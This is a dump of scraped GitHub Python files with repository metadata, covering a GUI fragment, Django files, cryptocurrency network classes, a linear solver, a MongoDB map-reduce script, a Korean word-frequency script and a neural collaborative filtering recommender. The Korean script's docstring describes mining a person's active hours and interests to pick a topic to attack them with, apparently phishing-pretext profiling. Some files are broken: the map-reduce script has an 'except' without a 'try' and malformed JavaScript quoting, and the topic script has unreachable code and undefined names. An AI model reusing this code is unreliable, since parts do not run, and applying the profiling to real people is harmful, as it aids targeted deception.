        window['PathField'].update(values['SavedPath'])
    if event == 'AddFile':
        # NOTE(review): list.append() returns None, so the original
        # update(values['Table'].append(...)) cleared the table. Append
        # first, then update with the resulting list. The exact row format
        # expected by sg.Table should be confirmed against PySimpleGUI docs.
        rows = values['Table']
        rows.append(values['AddFile'])
        window['Table'].update(rows)
window.Finalize()
window.close()  # BUGFIX: `window.close` without () was a no-op
| [
"tokikake42@gmail.com"
] | tokikake42@gmail.com |
4d4847f47f6987bffcd9ee7fb182daf363927984 | 729532b780c42b6c1ee667bf567d306c634e977e | /activity_note/migrations/0002_auto_20200114_0220.py | 3043463a861c6e29dac8a51f61e25567e619d973 | [] | no_license | pkubiak/hearty-playground | e52dc9ed0e8f6f350f6c4bf2d26c736e8fea55a9 | 8fd81a0961e59b7fd4f385e151001171f9d6dd09 | refs/heads/master | 2022-04-08T10:23:59.685961 | 2020-02-07T16:38:42 | 2020-02-07T16:38:42 | 226,224,651 | 1 | 0 | null | 2020-03-02T17:33:35 | 2019-12-06T01:56:43 | Python | UTF-8 | Python | false | false | 334 | py | # Generated by Django 3.0 on 2020-01-14 02:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('activity_note', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='NoteContent',
new_name='ActivityNote',
),
]
| [
"pawel.kubiak@protonmail.com"
] | pawel.kubiak@protonmail.com |
98e18716a9a40ce6f97772b337d0e7a52b7d9e22 | f07e56528bd10f93e6f9bb8b297e7e20ebd79e07 | /accounts/urls.py | b422e8ede9207237355a78c11628f7eb46f3d419 | [] | no_license | in-manish/miniwallet | 1ca1c4b3e0001ebc9d00895cb47b5ecfe26edc4a | 0fec75bf65308e6fe2cb7aae72471e47069bb041 | refs/heads/master | 2023-08-07T07:41:26.287578 | 2021-10-07T16:02:27 | 2021-10-07T16:02:27 | 414,030,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^obtain-token$', view=views.ObtainTokenAPIView.as_view(), name='obtain token'),
url(r'^register$', view=views.RegisterCustomerAPIView.as_view(), name='Register customer'),
]
| [
"sonal@fairfest.in"
] | sonal@fairfest.in |
9f31ced0545add05ccb31c2e6eb3960ae27a55b2 | 7cad80770718e655766dd038bc654ebe1ad2ab3e | /network/luxcoin.py | 6576af28c49f3760dde6240c7cd0d0d732ec5e78 | [] | no_license | kindanew/clove_bounty | d0e1f917dff5b3a23eae6a05d6449af068fb4dc9 | e707eebde301ac3728a5835d10d927aa83d27ab5 | refs/heads/master | 2021-04-29T00:29:37.698092 | 2018-02-24T02:34:33 | 2018-02-24T02:34:33 | 121,830,043 | 0 | 0 | null | 2018-02-17T05:34:54 | 2018-02-17T05:26:51 | Python | UTF-8 | Python | false | false | 781 | py | from clove.network.bitcoin import Bitcoin
class LUXCoin(Bitcoin):
    """
    Class with all the necessary LUX network information based on
    https://github.com/216k155/lux/blob/master/src/chainparams.cpp
    (date of access: 02/12/2018)
    """
    # Network identifier used by the clove framework.
    name = 'luxcoin'
    # Ticker symbols for this network (tuple, even for a single symbol).
    symbols = ('LUX', )
    # Static IPs and DNS seeds used for peer discovery.
    seeds = ('5.189.142.181', '5.77.44.147', '209.250.254.156', '45.76.114.209', 'luxseed1.luxcore.io', 'luxseed2.luxcore.io', 'luxseed3.luxcore.io', 'luxseed4.luxcore.io')
    # Default mainnet P2P port.
    port = 26868
class LUXCoinTestNet(LUXCoin):
    """
    Class with all the necessary LUX testing network information based on
    https://github.com/216k155/lux/blob/master/src/chainparams.cpp
    (date of access: 02/12/2018)
    """
    # Network identifier for the test network.
    name = 'test-luxcoin'
    # BUGFIX: ('88.198.192.110') is just a parenthesised *string*, so any
    # code iterating `seeds` would yield single characters. A one-element
    # tuple needs the trailing comma, matching the parent class's form.
    seeds = ('88.198.192.110',)
port = 28333 | [
"egorsego@git.training"
] | egorsego@git.training |
f0e81d55da28afc1669b6db65341cc6892e0c832 | 7825ee29507b3e0248ab7bab23ba44c70adc1feb | /numerical-methods/lab1/Rotate.py | 66bb7f7b448d714b30179d3d3ff79c88075c03d6 | [] | no_license | kramar42/university | 815bc80dd29c76e3b3ec9ee47e6d32b087759762 | 26faee8fe7df4ffe5982c3439dc3090ed6c6cb56 | refs/heads/master | 2021-01-19T14:06:53.062052 | 2014-10-22T20:09:17 | 2014-10-22T20:09:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 992 | py | # -*- coding: utf-8 -*-
from Sole import Sole
def RotateSolve(_A):
    """Solve the linear system in the augmented matrix *_A* via Givens rotations.

    *_A* must expose ``clone()``, ``size`` (number of equations) and row
    indexing ``A[i][k]``, where column ``size`` holds the right-hand side.
    Returns the solution vector as a plain list of floats.
    """
    A = _A.clone()  # work on a copy; the caller's matrix stays untouched
    # Forward pass: eliminate each sub-diagonal entry with a Givens rotation.
    for i in range(A.size - 1):
        for j in range(i + 1, A.size):
            a1 = A[i][i]
            a2 = A[j][i]
            if a2 == 0:
                # Already eliminated; also avoids 0/0 when a1 == a2 == 0.
                continue
            div = (a1 ** 2 + a2 ** 2) ** 0.5
            c = a1 / div
            s = a2 / div
            # Rotate rows i and j, including the augmented column.
            for k in range(i, A.size + 1):
                tmp = A[i][k]
                A[i][k] = c * A[i][k] + s * A[j][k]
                A[j][k] = -s * tmp + c * A[j][k]
    # Back substitution on the now upper-triangular system.
    # BUGFIX: the original ran this entire loop twice, verbatim; once suffices.
    x = [0] * A.size
    for i in range(A.size - 1, -1, -1):
        acc = 0
        for j in range(i + 1, A.size):
            acc += A[i][j] * x[j]
        x[i] = (A[i][A.size] - acc) / A[i][i]
    return x
if __name__ == '__main__':
Sole.printVector(RotateSolve(Sole(filename='../Data/A2')))
| [
"kramar42@gmail.com"
] | kramar42@gmail.com |
96e5b955a8c7eb02039fa532cc9f3790edc41ec2 | 48a8849cebc1c9d35dc8f2f5b1a91cbb533ee294 | /webot/static/m_r.py | 3b36d79fff2e32c0a545fdc96eada93faf827514 | [] | no_license | varwey/project | d5b3a3a0bfc35abf45004f95305d4b1a916718d7 | b1fe6a3774757aa48d1bbdcc763ec01500472ecf | refs/heads/master | 2021-01-13T01:27:01.142647 | 2014-06-05T11:02:58 | 2014-06-05T11:02:58 | 20,431,623 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,534 | py | #!/usr/bin/ env python
#coding:utf-8
import pymongo,MySQLdb
from bson.code import Code
import json
from datetime import datetime,timedelta
import time
no = time.time()
#map函数
m = Code("""
function() {
function format(dt) {
Y = dt.getFullYear();
m = (dt.getMonth()+1);
d = dt.getDate();
H = dt.getHours();
M = dt.getMinutes();
var zf = function(x) {
x = x.toString();
return x[1]?x:'0'+x
}
return Y+'-'+zf(m)+'-'+zf(d)+' '00:00:00'
}
key = {
'time': format(this.gtime),
};
val = {'sum':1};
emit(key, val);
}
""")
#reduce函数
r = Code("""
function(key,values) {
var sum=0;
values.forEach(function(x) {
sum += x.sum;
});
return {'sum':sum}
}
""")
def retime(dt):
    """Convert *dt* (a datetime or 'YYYY-mm-dd HH:MM:SS' string) to a local-time Unix timestamp."""
    parsed = time.strptime(str(dt), '%Y-%m-%d %H:%M:%S')
    return time.mktime(parsed)
conn = pymongo.Connection('192.168.3.39',27019)
db = conn.spider
print datetime.now(),'start!'
now = datetime.utcnow().replace(hour=16,minute=0,second=0,microsecond=0)
now = now - timedelta(days=1)
ago = now - timedelta(days=1)
result = db.item.map_reduce(m,r,'myresult',query={'gtime':{'$gte':ago,'$lt':now}})
except:
result = db.item.map_reduce(m,r,'myresult',query={'gtime':{'$gte':ago,'$lt':now}})
a=''
for d in result.find():
a+=(str(d['_id']['time']),d['value']['sum'])
fi = open('/res.csv','w')
d=fi.write(a)
fi.close()
| [
"910317157@qq.com"
] | 910317157@qq.com |
2ece69e64ed5dcc95014f6f9b290dd10aea8ebca | 580265e1d5593e8015dec26dadb99fe1f0ec7682 | /source/total/personal_topic.py | a34b8af6b8bd6de4789084773f3094e051493e8f | [] | no_license | protection2453/SPST_S | 3756282a8ceb22a3a14e5863c7261529e0741538 | b9246cc950ff66e3908b2d537f6a70f32006413a | refs/heads/master | 2020-09-10T02:35:14.456051 | 2019-11-19T17:46:45 | 2019-11-19T17:46:45 | 221,627,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,081 | py | """ 파일 순서 - 3 -
주요 활동 시간을 정했다면 다음에 필요한 것은 해당 유저가 관심있어하는
관심사를 가지고 공격할 주제를 만드는 것입니다.
관심사는 글의 특정 단어 빈도수로 측정합니다."""
from personal_data import *
import numpy as np
import re
from soynlp.tokenizer import MaxScoreTokenizer
boundmorpheme = ["은", "는", "이", "가", "을", "를", "로써", "에서", "에게서", "부터", "까지", "에게", "한테", "께", "와", "과", "의", "로서", "으로서", "로", "으로"] # 조사
exceptions = boundmorpheme
scores = {'티켓이': 0.3, '티켓': 0.7, '좋아요': 0.2, '좋아':0.5}
tokenizer = MaxScoreTokenizer(scores=scores)
def isHangul(text):
#Check the Python Version
pyVer3 = sys.version_info >= (3, 0)
if pyVer3 : # for Ver 3 or later
encText = text
else: # for Ver 2.x
if type(text) is not unicode:
encText = text.decode('utf-8')
else:
encText = text
hanCount = len(re.findall(u'[\u3130-\u318F\uAC00-\uD7A3]+', encText))
return hanCount > 0
iH = 0
def bringdata(lenarr2):
#데이터 가져오기
data = ""
for x in range(lenarr2):
data += arr2[x]
iH = isHangul(data)
pprint(iH)
return data
def datapaser(data):
#데이터 정제
parse = re.sub("[^0-9a-zA-Z\\s]+[^ ㄱ - ㅣ 가-힣]", "", data)
parse = parse.lower().split()
for x in range(len(parse)):
parse[x] = re.sub("[^ ㄱ - ㅣ 가-힣]+","",parse[x])
try:
ay = tokenizer.tokenize(parse[x])
if(ay == boundmorpheme):
pasrs[x] = ""
else:
parse[x] = ay
except:
parse[x] = re.sub("[^ ㄱ - ㅣ 가-힣]+","",parse[x])
parses = []
for x in range(len(parse)):
try:
parses.append(parse[x][0])
except:
continue
return parses
def express(parses):
#표현
counts = Counter(parses)
counts = counts.most_common()
length = len(counts)
newcount = []
for i in range(length):
if counts[i][0] not in exceptions:
newcount.append(counts[i])
counts_to_frame = pd.DataFrame(counts, columns = ["Word", "Counts"])
countsum1 = sum(counts_to_frame["Counts"])
per1 = [(counts_to_frame["Counts"][i]/countsum1) * 100 \
for i in range(len(counts_to_frame))]
counts_to_frame["Per"] = np.array(per1)
new_to_frame = pd.DataFrame(newcount, columns = ["Word", "Counts"])
countsum2 = sum(new_to_frame["Counts"])
per2 = [(new_to_frame["Counts"][i]/countsum2) * 100 \
for i in range(len(new_to_frame))]
new_to_frame["Per"] = np.array(per2)
fword = [newcount[i][0] for i in range(len(newcount))][:30]
fnumber = [newcount[i][1] for i in range(len(newcount))][:30]
return fword,fnumber
if iH:
reduceword = ['뉴콘','첫공','총막','피켓팅']
for x in reduceword:
if(fword[0] == x):
pointword = '콘서트'
else:
pointword = fword[0]
pointlist.append(pointword)
pointlist.append(fnumber[0])
else:
pointlist.append("한글 아님")
pointlist.append("None")
fword.append("None")
fxs = [i for i, _ in enumerate(fword)]
return pointlist
| [
"protection2453@gmail.com"
] | protection2453@gmail.com |
4163fd0a176f0f939577d0ef9995fd91af470c0c | e2e3982c626b49d57c51b5abafc0a0eb20915e6a | /neural-cf/test_ncf.py | 7ee5449afbd74f37a02ebe169a78d3198753c011 | [] | no_license | mindis/thesis | ee683869627e54b620c8582c8365205e0b5fd424 | 3676aa32be4f115ea0c79448ee6391d3386d496d | refs/heads/master | 2022-04-25T22:55:51.846029 | 2020-04-27T18:39:11 | 2020-04-27T18:39:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,521 | py | import logging
import pandas as pd
import numpy as np
import random
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import numpy as np
import pandas as pd
import math
import heapq
from tqdm import tqdm
def load_dataset(df):
"""
Loads dataset into a pandas dataframe
and transforms it into the format we need.
We then split it into a training and a test set.
"""
# Add column names
#df = df.drop(columns = 'Unnamed: 0', axis=1)
df.columns = ['user', 'item', 'rating']
# Drop any rows with empty cells or rows
# with a play count of zero.
df = df.dropna()
df = df.loc[df.rating != 0]
# Remove any users with fewer than 1 interaction.
df_count = df.groupby(['user']).count()
df['count'] = df.groupby('user')['user'].transform('count')
df = df[df['count'] > 1]
# Convert artists names into numerical IDs
df['user_id'] = df['user'].astype("category").cat.codes
df['item_id'] = df['item'].astype("category").cat.codes
# Create a lookup frame so we can get the artist
# names back in readable form later.
item_lookup = df[['item_id', 'item']].drop_duplicates()
item_lookup['item_id'] = item_lookup.item_id.astype(str)
print(item_lookup)
df.to_csv('/home/nick/Desktop/thesis/datasets/pharmacy-data/ratings-data/user-product.csv')
# Grab the columns we need in the order we need them.
df = df[['user_id', 'item_id', 'rating']]
# Create training and test sets.
df_train, df_test = train_test_split(df)
print(df_train,df_test)
# Create lists of all unique users and artists
users = list(np.sort(df.user_id.unique()))
items = list(np.sort(df.item_id.unique()))
# Get the rows, columns and values for our matrix.
rows = df_train.user_id.astype(int)
cols = df_train.item_id.astype(int)
values = list(df_train.rating)
# Get all user ids and item ids.
uids = np.array(rows.tolist())
iids = np.array(cols.tolist())
# Sample 100 negative interactions for each user in our test data
df_neg = get_negatives(uids, iids, items, df_test)
return uids, iids, df_train, df_test, df_neg, users, items, item_lookup
def get_negatives(uids, iids, items, df_test):
    """Sample 100 negative items for each (user, item) holdout pair in *df_test*.

    Row layout of the returned dataframe: column 0 holds the positive
    (user, item) tuple, columns 1..100 hold item ids the user never
    interacted with (rejection-sampled against the training interactions).

    Args:
        uids (np.array): user id of every training interaction.
        iids (np.array): item id of every training interaction.
        items (list): all unique item ids.
        df_test (dataframe): the holdout set with user_id/item_id columns.
    Returns:
        dataframe: one row per holdout pair, 101 columns.
    """
    observed = set(zip(uids, iids))
    pairs = zip(df_test['user_id'].values.tolist(),
                df_test['item_id'].values.tolist())
    rows = []
    for user, pos_item in pairs:
        row = [(user, pos_item)]
        # Keep drawing until 100 unobserved items have been collected.
        while len(row) < 101:
            candidate = np.random.randint(len(items))
            if (user, candidate) not in observed:
                row.append(candidate)
        rows.append(row)
    return pd.DataFrame(rows)
def mask_first(x):
    """Return an array shaped like *x* of 1s, with a 0 in the first slot.

    Used with ``groupby().transform`` to flag each user's first (holdout)
    interaction for removal from the training set.
    """
    result = np.ones_like(x)
    # Slice assignment also works for empty input; the original indexed
    # result[0] and raised IndexError on a zero-length group.
    result[:1] = 0
    return result
def train_test_split(df):
    """
    Splits our original data into one test and one
    training set.
    The test set is made up of one item for each user. This is
    our holdout item used to compute Top@K later.
    The training set is the same as our original data but
    without any of the holdout items.
    Args:
        df (dataframe): Our original data
    Returns:
        df_train (dataframe): All of our data except holdout items
        df_test (dataframe): Only our holdout items.
    """
    # Create two copies of our dataframe that we can modify
    df_test = df.copy(deep=True)
    # NOTE(review): this deep copy is overwritten by df.loc[mask] below
    # and could be dropped.
    df_train = df.copy(deep=True)
    # Group by user_id and select only the first item for
    # each user (our holdout).
    df_test = df_test.groupby(['user_id']).first()
    # groupby() moved user_id into the index; restore it as a column.
    df_test['user_id'] = df_test.index
    df_test = df_test[['user_id', 'item_id', 'rating']]
    # del df_test.index.name
    # Remove the same items as we for our test set in our training set.
    # mask_first() (defined above) marks each user's first row with 0 and
    # the rest with 1; the boolean mask keeps only the 1s.
    mask = df.groupby(['user_id'])['user_id'].transform(mask_first).astype(bool)
    df_train = df.loc[mask]
    return df_train, df_test
def get_train_instances():
    """Samples a number of negative user-item interactions for each
    user-item pair in our testing data.
    Returns:
        user_input (list): A list of all users for each item
        item_input (list): A list of all items for every user,
        both positive and negative interactions.
        labels (list): A list of all labels. 0 or 1.
    """
    # NOTE(review): reads the module-level globals `uids`, `iids`, `items`
    # and `num_neg` assigned in the __main__ block — confirm before reusing
    # this function elsewhere.
    user_input, item_input, labels = [], [], []
    # Set of all observed (user, item) pairs, for O(1) rejection sampling.
    zipped = set(zip(uids, iids))
    for (u, i) in zip(uids, iids):
        # Add our positive interaction
        user_input.append(u)
        item_input.append(i)
        labels.append(1)
        # Sample a number of random negative interactions
        for t in range(num_neg):
            j = np.random.randint(len(items))
            # Redraw until the item is one the user never interacted with.
            while (u, j) in zipped:
                j = np.random.randint(len(items))
            user_input.append(u)
            item_input.append(j)
            labels.append(0)
    return user_input, item_input, labels
def random_mini_batches(U, I, L, mini_batch_size=256):
    """Return shuffled mini-batches of (users, items, labels).

    BUGFIX: the original shuffled U, I and L with three *independent*
    random.sample calls, destroying the (user, item, label) alignment of
    every training example. A single shared permutation keeps each triple
    intact while still randomising batch order.

    Args:
        U (list): user id of every interaction.
        I (list): item id of every interaction.
        L (list): label (0/1) of every interaction.
        mini_batch_size (int): examples per batch; the final batch may be
            smaller when len(U) is not a multiple of the batch size.
    Returns:
        mini_batches (list): list of (batch_users, batch_items, batch_labels).
    """
    # One permutation applied to all three parallel lists.
    order = list(range(len(U)))
    random.shuffle(order)
    shuffled_U = [U[idx] for idx in order]
    shuffled_I = [I[idx] for idx in order]
    shuffled_L = [L[idx] for idx in order]

    mini_batches = []
    for start in range(0, len(U), mini_batch_size):
        end = start + mini_batch_size
        mini_batches.append((shuffled_U[start:end],
                             shuffled_I[start:end],
                             shuffled_L[start:end]))
    return mini_batches
def get_hits(k_ranked, holdout):
    """Return 1 if *holdout* appears anywhere in *k_ranked*, else 0."""
    return 1 if holdout in k_ranked else 0
def eval_rating(idx, test_ratings, test_negatives, K):
    """Generate ratings for the users in our test set and
    check if our holdout item is among the top K highest scores.
    Args:
        idx (int): Current index
        test_ratings (list): Our test set user-item pairs
        test_negatives (list): 100 negative items for each
        user in our test set.
        K (int): number of top recommendations
    Returns:
        hits (int): 1 if the holdout appeared in the top K
        predicted items, 0 if not.
        k_ranked (list): the K highest-scored item ids, best first.
    """
    # NOTE(review): relies on the module-level TF globals `session`, `user`,
    # `item` and `output_layer` built in the __main__ block — confirm they
    # exist before calling this from elsewhere.
    map_item_score = {}
    # Get the negative interactions our user.
    items = test_negatives[idx]
    # Get the user idx.
    user_idx = test_ratings[idx][0]
    # Get the item idx, i.e. our holdout item.
    holdout = test_ratings[idx][1]
    # Add the holdout to the end of the negative interactions list.
    # NOTE(review): this mutates test_negatives[idx] in place, so calling
    # eval_rating twice for the same idx appends the holdout twice.
    items.append(holdout)
    # Prepare our user and item arrays for tensorflow.
    predict_user = np.full(len(items), user_idx, dtype='int32').reshape(-1, 1)
    np_items = np.array(items).reshape(-1, 1)
    # Feed user and items into the TF graph .
    predictions = session.run([output_layer], feed_dict={user: predict_user, item: np_items})
    # Get the predicted scores as a list
    predictions = predictions[0].flatten().tolist()
    # Map predicted score to item id.
    for i in range(len(items)):
        current_item = items[i]
        map_item_score[current_item] = predictions[i]
    # Get the K highest ranked items as a list
    k_ranked = heapq.nlargest(K, map_item_score, key=map_item_score.get)
    # Get a list of hit or no hit.
    hits = get_hits(k_ranked, holdout)
    return hits,k_ranked
def evaluate(df_neg, K=10):
    """Calculate the top@K hit ratio for our recommendations.
    Args:
        df_neg (dataframe): dataframe containing our holdout items
        and 100 randomly sampled negative interactions for each
        (user, item) holdout pair.
        K (int): The 'K' number of ranked predictions we want
        our holdout item to be present in.
    Returns:
        hits (list): list of "hits". 1 if the holdout was present in
        the K highest ranked predictions. 0 if not.
        topN_df (dataframe): one column per test user holding that
        user's K highest-ranked item ids.
    """
    # NOTE(review): reads the module-level global `df_test` from the
    # __main__ block and calls the sibling eval_rating() above.
    hits = []
    test_u = df_test['user_id'].values.tolist()
    test_i = df_test['item_id'].values.tolist()
    test_ratings = list(zip(test_u, test_i))
    print(test_ratings)
    print(type(test_ratings))
    #test_ratings[idx][1]
    #initialize a dataframe for Top-N products for each user
    topN_df = pd.DataFrame(columns=np.arange(len(test_ratings)))
    # Column 0 of df_neg holds the (user, item) tuple; keep only the
    # sampled negative item ids.
    df_neg = df_neg.drop(df_neg.columns[0], axis=1)
    test_negatives = df_neg.values.tolist()
    for idx in range(len(test_ratings)):
        # For each idx, call eval_one_rating
        hitrate, topk_ranked = eval_rating(idx, test_ratings, test_negatives, K)
        topN_df[idx] = topk_ranked
        hits.append(hitrate)
    return hits,topN_df
if __name__ == '__main__':
data = pd.read_csv('/home/nick/Desktop/thesis/datasets/pharmacy-data/ratings-data/user_product_ratings.csv')
uids, iids, df_train, df_test, df_neg, users, items, item_lookup = load_dataset(data)
root = logging.getLogger()
if root.handlers:
root.handlers = []
logging.basicConfig(format='%(asctime)s : %(message)s',
filename='neural_cf.log',
level=logging.INFO)
logging.info('Start....')
# -------------
# HYPERPARAMS
# -------------
num_neg = 4
latent_features = 8
epochs = 20
batch_size = 256
learning_rate = 0.001
logging.info('num_neg: {0},latent_features: {1},epochs: {2},'
'batch_size: {3},learning_rate: {4}'.format(num_neg,latent_features,epochs,batch_size,learning_rate))
# -------------------------
# TENSORFLOW GRAPH
# -------------------------
train = True
graph = tf.Graph()
with graph.as_default():
# Define input placeholders for user, item and label.
user = tf.placeholder(tf.int32, shape=(None, 1))
item = tf.placeholder(tf.int32, shape=(None, 1))
label = tf.placeholder(tf.int32, shape=(None, 1))
# User embedding for MLP
mlp_u_var = tf.Variable(tf.random_normal([len(users), 32], stddev=0.05),
name='mlp_user_embedding')
mlp_user_embedding = tf.nn.embedding_lookup(mlp_u_var, user)
# Item embedding for MLP
mlp_i_var = tf.Variable(tf.random_normal([len(items), 32], stddev=0.05),
name='mlp_item_embedding')
mlp_item_embedding = tf.nn.embedding_lookup(mlp_i_var, item)
# User embedding for GMF
gmf_u_var = tf.Variable(tf.random_normal([len(users), latent_features],
stddev=0.05), name='gmf_user_embedding')
gmf_user_embedding = tf.nn.embedding_lookup(gmf_u_var, user)
# Item embedding for GMF
gmf_i_var = tf.Variable(tf.random_normal([len(items), latent_features],
stddev=0.05), name='gmf_item_embedding')
gmf_item_embedding = tf.nn.embedding_lookup(gmf_i_var, item)
# Our GMF layers
gmf_user_embed = tf.keras.layers.Flatten()(gmf_user_embedding)
gmf_item_embed = tf.keras.layers.Flatten()(gmf_item_embedding)
gmf_matrix = tf.multiply(gmf_user_embed, gmf_item_embed)
# Our MLP layers
mlp_user_embed = tf.keras.layers.Flatten()(mlp_user_embedding)
mlp_item_embed = tf.keras.layers.Flatten()(mlp_item_embedding)
mlp_concat = tf.keras.layers.concatenate([mlp_user_embed, mlp_item_embed])
mlp_dropout = tf.keras.layers.Dropout(0.2)(mlp_concat)
mlp_layer_1 = tf.keras.layers.Dense(64, activation='relu', name='layer1')(mlp_dropout)
mlp_batch_norm1 = tf.keras.layers.BatchNormalization(name='batch_norm1')(mlp_layer_1)
mlp_dropout1 = tf.keras.layers.Dropout(0.2, name='dropout1')(mlp_batch_norm1)
mlp_layer_2 = tf.keras.layers.Dense(32, activation='relu', name='layer2')(mlp_dropout1)
mlp_batch_norm2 = tf.keras.layers.BatchNormalization(name='batch_norm1')(mlp_layer_2)
mlp_dropout2 = tf.keras.layers.Dropout(0.2, name='dropout1')(mlp_batch_norm2)
mlp_layer_3 = tf.keras.layers.Dense(16, activation='relu', name='layer3')(mlp_dropout2)
mlp_layer_4 = tf.keras.layers.Dense(8, activation='relu', name='layer4')(mlp_layer_3)
# We merge the two networks together
merged_vector = tf.keras.layers.concatenate([gmf_matrix, mlp_layer_4])
# Our final single neuron output layer.
output_layer = tf.keras.layers.Dense(1,kernel_initializer="lecun_uniform",name='output_layer')(merged_vector)
# Our loss function as a binary cross entropy.
loss = tf.losses.sigmoid_cross_entropy(label, output_layer)
# Train using the Adam optimizer to minimize our loss.
opt = tf.train.AdamOptimizer(learning_rate=learning_rate)
step = opt.minimize(loss)
# Initialize all tensorflow variables.
init = tf.global_variables_initializer()
saver = tf.train.Saver(tf.global_variables(), max_to_keep=10)
session = tf.Session(config=None, graph=graph)
session.run(init)
if train is True:
for epoch in range(epochs):
# Get our training input.
user_input, item_input, labels = get_train_instances()
# Generate a list of minibatches.
#print(user_input,item_input,labels)
minibatches = random_mini_batches(user_input, item_input, labels)
# This has nothing to do with tensorflow but gives
# us a nice progress bar for the training
progress = tqdm(total=len(minibatches))
# Loop over each batch and feed our users, items and labels
# into our graph.
for minibatch in minibatches:
feed_dict = {user: np.array(minibatch[0]).reshape(-1, 1),
item: np.array(minibatch[1]).reshape(-1, 1),
label: np.array(minibatch[2]).reshape(-1, 1)}
# Execute the graph.
_, l = session.run([step, loss], feed_dict)
# Update the progress
progress.update(1)
progress.set_description('Epoch: %d - Loss: %.3f' % (epoch + 1, l))
progress.close()
logging.info('Epoch:{0} - Loss: {1}'.format(epoch+1, l))
saver.save(session,'./checkpoints/ncf-model',global_step=epoch)
else:
test_epoch = 3
ckpt = tf.train.get_checkpoint_state('./checkpoints')
if ckpt and ckpt.model_checkpoint_path:
saver.restore(session, './checkpoints/ncf-model-{}'.format(test_epoch))
# Calculate top@K
hits,topK_products = evaluate(df_neg)
print('\nTop-K product preferences for each user:\n{}'.format(topK_products))
print('\n Hit-Ratio(HR):{}'.format(np.array(hits).mean())) | [
"nick_gianno@hotmail.com"
] | nick_gianno@hotmail.com |
9fcbebcf0c1246df1c7c00e33c87e6b46afce5be | f68425cbf0bdd1e73ff4be34e5068a9375a21808 | /vv/bin/flask | ed72d50e73fae65bef80f10836c8b6ca35f4f714 | [] | no_license | Software-Engineer-Project2/MIMI-Pet-Wars | 2ca8e7fbac110428e1c6e018d0e708b2e26acdb5 | efb2d33245e34d439a6823440b559ec95e2e509c | refs/heads/master | 2021-02-27T18:47:29.474439 | 2020-06-06T17:55:16 | 2020-06-06T17:55:16 | 245,627,419 | 1 | 0 | null | 2020-03-08T15:50:52 | 2020-03-07T12:18:44 | Python | UTF-8 | Python | false | false | 245 | #!/Users/ivyu/Documents/MIMI-Pet-Wars/vv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jie.yu@ucdconnect.ie"
] | jie.yu@ucdconnect.ie |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.